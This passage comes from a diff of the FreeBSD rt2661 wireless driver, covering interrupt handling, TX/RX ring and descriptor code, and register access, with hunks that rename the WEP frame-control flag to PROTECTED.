rt2661_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ RT2661_EEPROM_CTL(sc, 0); RT2661_EEPROM_CTL(sc, RT2661_S); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_C); RT2661_EEPROM_CTL(sc, RT2661_S); /* write start bit (1) */ RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D | RT2661_C); /* write READ opcode (10) */ RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_D | RT2661_C); RT2661_EEPROM_CTL(sc, RT2661_S); RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_C); /* write address (A5-A0 or A7-A0) */ n = (RAL_READ(sc, RT2661_E2PROM_CSR) & RT2661_93C46) ? 5 : 7; for (; n >= 0; n--) { RT2661_EEPROM_CTL(sc, RT2661_S | (((addr >> n) & 1) << RT2661_SHIFT_D)); RT2661_EEPROM_CTL(sc, RT2661_S | (((addr >> n) & 1) << RT2661_SHIFT_D) | RT2661_C); } RT2661_EEPROM_CTL(sc, RT2661_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { RT2661_EEPROM_CTL(sc, RT2661_S | RT2661_C); tmp = RAL_READ(sc, RT2661_E2PROM_CSR); val |= ((tmp & RT2661_Q) >> RT2661_SHIFT_Q) << n; RT2661_EEPROM_CTL(sc, RT2661_S); } RT2661_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ RT2661_EEPROM_CTL(sc, RT2661_S); RT2661_EEPROM_CTL(sc, 0); RT2661_EEPROM_CTL(sc, RT2661_C); return val; } static void rt2661_tx_intr(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct rt2661_tx_ring *txq; struct rt2661_tx_data *data; uint32_t val; int qid, retrycnt; struct ieee80211vap *vap; for (;;) { struct ieee80211_node *ni; struct mbuf *m; val = RAL_READ(sc, RT2661_STA_CSR4); if (!(val & RT2661_TX_STAT_VALID)) break; /* retrieve the queue in which this frame was sent */ qid = RT2661_TX_QID(val); txq = (qid <= 3) ? &sc->txq[qid] : &sc->mgtq; /* retrieve rate control algorithm context */ data = &txq->data[txq->stat]; m = data->m; data->m = NULL; ni = data->ni; data->ni = NULL; /* if no frame has been sent, ignore */ if (ni == NULL) continue; else vap = ni->ni_vap; switch (RT2661_TX_RESULT(val)) { case RT2661_TX_SUCCESS: retrycnt = RT2661_TX_RETRYCNT(val); DPRINTFN(sc, 10, "data frame sent successfully after " "%d retries\n", retrycnt); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); ifp->if_opackets++; break; case RT2661_TX_RETRY_FAIL: retrycnt = RT2661_TX_RETRYCNT(val); DPRINTFN(sc, 9, "%s\n", "sending data frame failed (too much retries)"); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ifp->if_oerrors++; break; default: /* other failure */ device_printf(sc->sc_dev, "sending data frame failed 0x%08x\n", val); ifp->if_oerrors++; } DPRINTFN(sc, 15, "tx done q=%d idx=%u\n", qid, txq->stat); txq->queued--; if (++txq->stat >= txq->count) /* faster than % count */ txq->stat = 0; if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, RT2661_TX_RESULT(val) != RT2661_TX_SUCCESS); m_freem(m); ieee80211_free_node(ni); } sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2661_start_locked(ifp); } static void rt2661_tx_dma_intr(struct rt2661_softc *sc, struct rt2661_tx_ring *txq) { struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &txq->desc[txq->next]; data = &txq->data[txq->next]; if ((le32toh(desc->flags) & RT2661_TX_BUSY) || !(le32toh(desc->flags) & RT2661_TX_VALID)) break; bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(txq->data_dmat, data->map); /* descriptor is no longer valid */ desc->flags &= ~htole32(RT2661_TX_VALID); DPRINTFN(sc, 15, "tx dma done q=%p idx=%u\n", txq, txq->next); if (++txq->next >= txq->count) /* faster than % count */ txq->next = 0; } bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); } static void rt2661_rx_intr(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rt2661_rx_desc *desc; struct rt2661_rx_data *data; bus_addr_t physaddr; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *mnew, *m; int error; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { int8_t rssi, nf; desc = &sc->rxq.desc[sc->rxq.cur]; data = &sc->rxq.data[sc->rxq.cur]; if (le32toh(desc->flags) & RT2661_RX_BUSY) break; if ((le32toh(desc->flags) & RT2661_RX_PHY_ERROR) || (le32toh(desc->flags) & RT2661_RX_CRC_ERROR)) { /* * This should not happen since we did not request * to receive those frames when we filled TXRX_CSR0. */ DPRINTFN(sc, 5, "PHY or CRC error flags 0x%08x\n", le32toh(desc->flags)); ifp->if_ierrors++; goto skip; } if ((le32toh(desc->flags) & RT2661_RX_CIPHER_MASK) != 0) { ifp->if_ierrors++; goto skip; } /* * Try to allocate a new mbuf for this ring element and load it * before processing the current mbuf. If the ring element * cannot be loaded, drop the received packet and reuse the old * mbuf. In the unlikely case that the old mbuf can't be * reloaded either, explicitly panic. */ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; goto skip; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(mnew, void *), MCLBYTES, rt2661_dma_map_addr, &physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2661_dma_map_addr, &physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; goto skip; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = mnew; desc->physaddr = htole32(physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (le32toh(desc->flags) >> 16) & 0xfff; rssi = rt2661_get_rssi(sc, desc->rssi); /* Error happened during RSSI conversion. */ if (rssi < 0) rssi = -30; /* XXX ignored by net80211 */ nf = RT2661_NOISE_FLOOR; if (ieee80211_radiotap_active(ic)) { struct rt2661_rx_radiotap_header *tap = &sc->sc_rxtap; uint32_t tsf_lo, tsf_hi; /* get timestamp (low and high 32 bits) */ tsf_hi = RAL_READ(sc, RT2661_TXRX_CSR13); tsf_lo = RAL_READ(sc, RT2661_TXRX_CSR12); tap->wr_tsf = htole64(((uint64_t)tsf_hi << 32) | tsf_lo); tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(desc->rate, (desc->flags & htole32(RT2661_RX_OFDM)) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; } sc->sc_flags |= RAL_INPUT_RUNNING; RAL_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame *); /* send the frame to the 802.11 layer */ ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); RAL_LOCK(sc); sc->sc_flags &= ~RAL_INPUT_RUNNING; skip: desc->flags |= htole32(RT2661_RX_BUSY); DPRINTFN(sc, 15, "rx intr idx=%u\n", sc->rxq.cur); sc->rxq.cur = (sc->rxq.cur + 1) % RT2661_RX_RING_COUNT; } bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); } /* ARGSUSED */ static void rt2661_mcu_beacon_expire(struct rt2661_softc *sc) { /* do nothing */ } static void rt2661_mcu_wakeup(struct rt2661_softc *sc) { RAL_WRITE(sc, RT2661_MAC_CSR11, 5 << 16); RAL_WRITE(sc, RT2661_SOFT_RESET_CSR, 0x7); RAL_WRITE(sc, RT2661_IO_CNTL_CSR, 0x18); RAL_WRITE(sc, RT2661_PCI_USEC_CSR, 0x20); /* send wakeup command to MCU */ rt2661_tx_cmd(sc, RT2661_MCU_CMD_WAKEUP, 0); } static void rt2661_mcu_cmd_intr(struct rt2661_softc *sc) { RAL_READ(sc, RT2661_M2H_CMD_DONE_CSR); RAL_WRITE(sc, RT2661_M2H_CMD_DONE_CSR, 0xffffffff); } void rt2661_intr(void *arg) { struct rt2661_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t r1, r2; RAL_LOCK(sc); /* disable MAC and MCU interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0xffffff7f); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0xffffffff); /* don't re-enable interrupts if we're shutting down */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); return; } r1 = RAL_READ(sc, RT2661_INT_SOURCE_CSR); RAL_WRITE(sc, RT2661_INT_SOURCE_CSR, r1); r2 = RAL_READ(sc, RT2661_MCU_INT_SOURCE_CSR); RAL_WRITE(sc, RT2661_MCU_INT_SOURCE_CSR, r2); if (r1 & RT2661_MGT_DONE) rt2661_tx_dma_intr(sc, &sc->mgtq); if (r1 & RT2661_RX_DONE) rt2661_rx_intr(sc); if (r1 & RT2661_TX0_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[0]); if (r1 & RT2661_TX1_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[1]); if (r1 & RT2661_TX2_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[2]); if (r1 & RT2661_TX3_DMA_DONE) rt2661_tx_dma_intr(sc, &sc->txq[3]); if (r1 & RT2661_TX_DONE) rt2661_tx_intr(sc); if (r2 & RT2661_MCU_CMD_DONE) rt2661_mcu_cmd_intr(sc); if (r2 & RT2661_MCU_BEACON_EXPIRE) rt2661_mcu_beacon_expire(sc); if (r2 & RT2661_MCU_WAKEUP) rt2661_mcu_wakeup(sc); /* re-enable MAC and MCU interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0x0000ff10); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0); RAL_UNLOCK(sc); } static uint8_t rt2661_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void rt2661_setup_tx_desc(struct rt2661_softc *sc, struct rt2661_tx_desc *desc, uint32_t flags, uint16_t xflags, int len, int rate, const bus_dma_segment_t *segs, int nsegs, int ac) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int i, remainder; desc->flags = htole32(flags); desc->flags |= htole32(len << 16); desc->flags |= htole32(RT2661_TX_BUSY | RT2661_TX_VALID); desc->xflags = htole16(xflags); desc->xflags |= htole16(nsegs << 13); desc->wme = htole16( RT2661_QID(ac) | RT2661_AIFSN(2) | RT2661_LOGCWMIN(4) | RT2661_LOGCWMAX(10)); /* * Remember in which queue this frame was sent. This field is driver * private data only. It will be made available by the NIC in STA_CSR4 * on Tx interrupts. */ desc->qid = ac; /* setup PLCP fields */ desc->plcp_signal = rt2661_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RT2661_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RT2661_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } /* RT2x61 supports scatter with up to 5 segments */ for (i = 0; i < nsegs; i++) { desc->addr[i] = htole32(segs[i].ds_addr); desc->len [i] = htole16(segs[i].ds_len); } } static int rt2661_tx_mgt(struct rt2661_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; struct ieee80211_frame *wh; struct ieee80211_key *k; bus_dma_segment_t segs[RT2661_MAX_SCATTER]; uint16_t dur; uint32_t flags = 0; /* XXX HWSEQ */ int nsegs, rate, error; desc = &sc->mgtq.desc[sc->mgtq.cur]; data = &sc->mgtq.data[sc->mgtq.cur]; rate = vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)].mgmtrate; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } } error = bus_dmamap_load_mbuf_sg(sc->mgtq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2661_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* management frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; wh = mtod(m0, struct ieee80211_frame *); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2661_TX_NEED_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); /* tell hardware to add timestamp in probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) flags |= RT2661_TX_TIMESTAMP; } rt2661_setup_tx_desc(sc, desc, flags, 0 /* XXX HWSEQ */, m0->m_pkthdr.len, rate, segs, nsegs, RT2661_QID_MGT); bus_dmamap_sync(sc->mgtq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->mgtq.desc_dmat, sc->mgtq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending mgt frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->mgtq.cur, rate); /* kick mgt */ sc->mgtq.queued++; sc->mgtq.cur = (sc->mgtq.cur + 1) % RT2661_MGT_RING_COUNT; RAL_WRITE(sc, RT2661_TX_CNTL_CSR, RT2661_KICK_MGT); return 0; } static int rt2661_sendprot(struct rt2661_softc *sc, int ac, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; struct rt2661_tx_ring *txq = &sc->txq[ac]; const struct ieee80211_frame *wh; struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort, error; uint16_t dur; bus_dma_segment_t segs[RT2661_MAX_SCATTER]; int nsegs; KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RT2661_TX_MORE_FRAG; if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RT2661_TX_NEED_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return ENOBUFS; } data = &txq->data[txq->cur]; desc = &txq->desc[txq->cur]; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, mprot, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(mprot); return error; } data->m = mprot; data->ni = ieee80211_ref_node(ni); /* ctl frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; rt2661_setup_tx_desc(sc, desc, flags, 0, mprot->m_pkthdr.len, protrate, segs, 1, ac); bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); txq->queued++; txq->cur = (txq->cur + 1) % RT2661_TX_RING_COUNT; return 0; } static int rt2661_tx_data(struct rt2661_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, int ac) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rt2661_tx_ring *txq = &sc->txq[ac]; struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; const struct chanAccParams *cap; struct mbuf *mnew; bus_dma_segment_t segs[RT2661_MAX_SCATTER]; uint16_t dur; uint32_t flags; int error, nsegs, rate, noack = 0; wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { rate = tp->mcastrate; } else if (m0->m_flags & M_EAPOL) { rate = tp->mgmtrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } rate &= IEEE80211_RATE_VAL; if (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_QOS) { cap = &ic->ic_wme.wme_chanParams; noack = cap->cap_wmeParams[ac].wmep_noackPolicy; } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = rt2661_sendprot(sc, ac, m0, ni, prot, rate); if (error) { m_freem(m0); return error; } flags |= RT2661_TX_LONG_RETRY | RT2661_TX_IFS; } } data = &txq->data[txq->cur]; desc = &txq->desc[txq->cur]; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } /* packet header have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct rt2661_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* remember link conditions for rate adaptation algorithm */ if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) { data->rix = ni->ni_txrate; /* XXX probably need last rssi value and not avg */ data->rssi = ic->ic_node_getrssi(ni); } else data->rix = IEEE80211_FIXED_RATE_NONE; if (!noack && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2661_TX_NEED_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); } rt2661_setup_tx_desc(sc, desc, flags, 0, m0->m_pkthdr.len, rate, segs, nsegs, ac); bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending data frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, txq->cur, rate); /* kick Tx */ txq->queued++; txq->cur = (txq->cur + 1) % RT2661_TX_RING_COUNT; RAL_WRITE(sc, RT2661_TX_CNTL_CSR, 1 << ac); return 0; } static void rt2661_start_locked(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; struct mbuf *m; struct ieee80211_node *ni; int ac; RAL_LOCK_ASSERT(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING) || sc->sc_invalid) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ac = M_WME_GETAC(m); if (sc->txq[ac].queued >= RT2661_TX_RING_COUNT - 1) { /* there is no place left in this ring */ IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (rt2661_tx_data(sc, m, ni, ac) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } sc->sc_tx_timer = 5; } } static void rt2661_start(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2661_start_locked(ifp); RAL_UNLOCK(sc); } static int rt2661_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->mgtq.queued >= RT2661_MGT_RING_COUNT) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENOBUFS; /* XXX */ } ifp->if_opackets++; /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. * XXX raw path */ if (rt2661_tx_mgt(sc, m, ni) != 0) goto bad; sc->sc_tx_timer = 5; RAL_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; ieee80211_free_node(ni); RAL_UNLOCK(sc); return EIO; /* XXX */ } static void rt2661_watchdog(void *arg) { struct rt2661_softc *sc = (struct rt2661_softc *)arg; struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); if (sc->sc_invalid) /* card ejected */ return; if (sc->sc_tx_timer > 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); rt2661_init_locked(sc); ifp->if_oerrors++; /* NB: callout is reset in rt2661_init() */ return; } callout_reset(&sc->watchdog_ch, hz, rt2661_watchdog, sc); } static int rt2661_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rt2661_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rt2661_init_locked(sc); startall = 1; } else rt2661_update_promisc(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2661_stop_locked(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void rt2661_bbp_write(struct rt2661_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2661_PHY_CSR3) & RT2661_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = RT2661_BBP_BUSY | (reg & 0x7f) << 8 | val; RAL_WRITE(sc, RT2661_PHY_CSR3, tmp); DPRINTFN(sc, 15, "BBP R%u <- 0x%02x\n", reg, val); } static uint8_t rt2661_bbp_read(struct rt2661_softc *sc, uint8_t reg) { uint32_t val; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2661_PHY_CSR3) & RT2661_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } val = RT2661_BBP_BUSY | RT2661_BBP_READ | reg << 8; RAL_WRITE(sc, RT2661_PHY_CSR3, val); for (ntries = 0; ntries < 100; ntries++) { val = RAL_READ(sc, RT2661_PHY_CSR3); if (!(val & RT2661_BBP_BUSY)) return val & 0xff; DELAY(1); } device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } static void rt2661_rf_write(struct rt2661_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2661_PHY_CSR4) & RT2661_RF_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT2661_RF_BUSY | RT2661_RF_21BIT | (val & 0x1fffff) << 2 | (reg & 3); RAL_WRITE(sc, RT2661_PHY_CSR4, tmp); /* remember last written value in sc */ sc->rf_regs[reg] = val; DPRINTFN(sc, 15, "RF R[%u] <- 0x%05x\n", reg & 3, val & 0x1fffff); } static int rt2661_tx_cmd(struct rt2661_softc *sc, uint8_t cmd, uint16_t arg) { if (RAL_READ(sc, RT2661_H2M_MAILBOX_CSR) & RT2661_H2M_BUSY) return EIO; /* there is already a command pending */ RAL_WRITE(sc, RT2661_H2M_MAILBOX_CSR, RT2661_H2M_BUSY | RT2661_TOKEN_NO_INTR << 16 | arg); RAL_WRITE(sc, RT2661_HOST_CMD_CSR, RT2661_KICK_CMD | cmd); return 0; } static void rt2661_select_antenna(struct rt2661_softc *sc) { uint8_t bbp4, bbp77; uint32_t tmp; bbp4 = rt2661_bbp_read(sc, 4); bbp77 = rt2661_bbp_read(sc, 77); /* TBD */ /* make sure Rx is disabled before switching antenna */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0); RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp | RT2661_DISABLE_RX); rt2661_bbp_write(sc, 4, bbp4); rt2661_bbp_write(sc, 77, bbp77); /* restore Rx filter */ RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); } /* * Enable multi-rate retries for frames sent at OFDM rates. * In 802.11b/g mode, allow fallback to CCK rates. */ static void rt2661_enable_mrr(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2661_TXRX_CSR4); tmp &= ~RT2661_MRR_CCK_FALLBACK; if (!IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) tmp |= RT2661_MRR_CCK_FALLBACK; tmp |= RT2661_MRR_ENABLED; RAL_WRITE(sc, RT2661_TXRX_CSR4, tmp); } static void rt2661_set_txpreamble(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2661_TXRX_CSR4); tmp &= ~RT2661_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2661_SHORT_PREAMBLE; RAL_WRITE(sc, 